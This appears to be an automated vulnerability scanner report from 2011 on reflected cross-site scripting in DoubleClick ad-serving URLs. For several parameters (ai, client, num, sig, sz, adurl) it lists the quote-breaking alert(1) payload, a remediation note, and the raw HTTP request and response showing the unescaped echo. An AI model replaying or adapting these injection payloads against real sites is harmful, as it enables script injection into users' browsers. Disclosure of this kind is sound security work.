<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=3ab7c"-alert(1)-"ad8c3af37fdhttp://content.schwab.com/flash/streetsmartedge/pre-launch/ssedge/intro.html?offer=ssedge"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscript ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff78a"-alert(1)-"3582cf30a1 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQff78a"-alert(1)-"3582cf30a1&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=;ord=1859536705? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Thu, 03 Feb 2011 16:03:55 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7521
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... h4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQff78a"-alert(1)-"3582cf30a1&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=http%3a%2f%2fcontent.schwab.com/flash/streetsmartedge/pre-launch/ssedge/intro.html%3Foffer%3Dssedge"); var fscUrl = u ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69442"-alert(1)-"07e6bcbb79d was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-410367935223407369442"-alert(1)-"07e6bcbb79d&adurl=;ord=1859536705? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Thu, 03 Feb 2011 16:04:52 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7519
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... ImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-410367935223407369442"-alert(1)-"07e6bcbb79d&adurl=http%3a%2f%2fcontent.schwab.com/flash/streetsmartedge/pre-launch/ssedge/intro.html%3Foffer%3Dssedge"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = "";
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3c2d"-alert(1)-"a12e235cd32 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1c3c2d"-alert(1)-"a12e235cd32&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=;ord=1859536705? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Thu, 03 Feb 2011 16:04:08 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7521
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... YXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1c3c2d"-alert(1)-"a12e235cd32&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=http%3a%2f%2fcontent.schwab.com/flash/streetsmartedge/pre-launch/ssedge/intro.html%3Foffer%3Dssedge"); var fscUrl = url; v ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eedea"-alert(1)-"b4205954787 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQeedea"-alert(1)-"b4205954787&client=ca-pub-4103679352234073&adurl=;ord=1859536705? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Thu, 03 Feb 2011 16:04:29 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7519
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQeedea"-alert(1)-"b4205954787&client=ca-pub-4103679352234073&adurl=http%3a%2f%2fcontent.schwab.com/flash/streetsmartedge/pre-launch/ssedge/intro.html%3Foffer%3Dssedge"); var fscUrl = url; var fscUrlClickTagFound = false; var wm ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 578f1"-alert(1)-"9cb53d4b6d7 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N6036.GoogleFinance/B5133220.11;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=L578f1"-alert(1)-"9cb53d4b6d7&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4Njk4NjQmaz1iYW5rcyZsPURhbGxhcyUyQytUWJgCgB64AhjIAvDfoxqoAwH1AwAAAMQ&num=1&sig=AGiWqtz4qZqfIzfv-DSvPyT6FbU7TuUAMQ&client=ca-pub-4103679352234073&adurl=;ord=1859536705? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Thu, 03 Feb 2011 16:03:42 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7527
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1db/%2a/j%3B235044966%3B1-0%3B0%3B58876509%3B3454-728/90%3B40290298/40308085/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=L578f1"-alert(1)-"9cb53d4b6d7&ai=BFO39S9FKTaiCFKjtlQe2q80qmM3F_gGomaveHcCNtwEAEAEYASCq9oUYOABQ5eTNw_3_____AWDJvrKJkKTQEbIBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1s ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69f57'-alert(1)-'ca7e6a01360 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=69f57'-alert(1)-'ca7e6a01360 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7504 Cache-Control: no-cache Pragma: no-cache Date: Thu, 03 Feb 2011 16:06:04 GMT Expires: Thu, 03 Feb 2011 16:06:04 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... z0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=69f57'-alert(1)-'ca7e6a01360https://www.ally.com/bank/interest-checking-account/index.html?CP=57865895;39213494\"> ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48315"-alert(1)-"6e66920d7bf was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=48315"-alert(1)-"6e66920d7bf HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 7504 Cache-Control: no-cache Pragma: no-cache Date: Thu, 03 Feb 2011 16:05:59 GMT Expires: Thu, 03 Feb 2011 16:05:59 GMT
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... z0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=48315"-alert(1)-"6e66920d7bfhttps://www.ally.com/bank/interest-checking-account/index.html?CP=57865895;39213494"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9569'-alert(1)-'6b525c8dbf5 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAEc9569'-alert(1)-'6b525c8dbf5&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:04:13 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7574
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... naAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAEc9569'-alert(1)-'6b525c8dbf5&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B40155600\"> ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 417c6"-alert(1)-"e33aa584cf5 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE417c6"-alert(1)-"e33aa584cf5&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:04:09 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7540
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... naAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE417c6"-alert(1)-"e33aa584cf5&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B39213494"); var fscUrl = url; ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1f7b"-alert(1)-"f629491b606 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073b1f7b"-alert(1)-"f629491b606&adurl=;ord=1608247292? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Thu, 03 Feb 2011 16:05:37 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7574
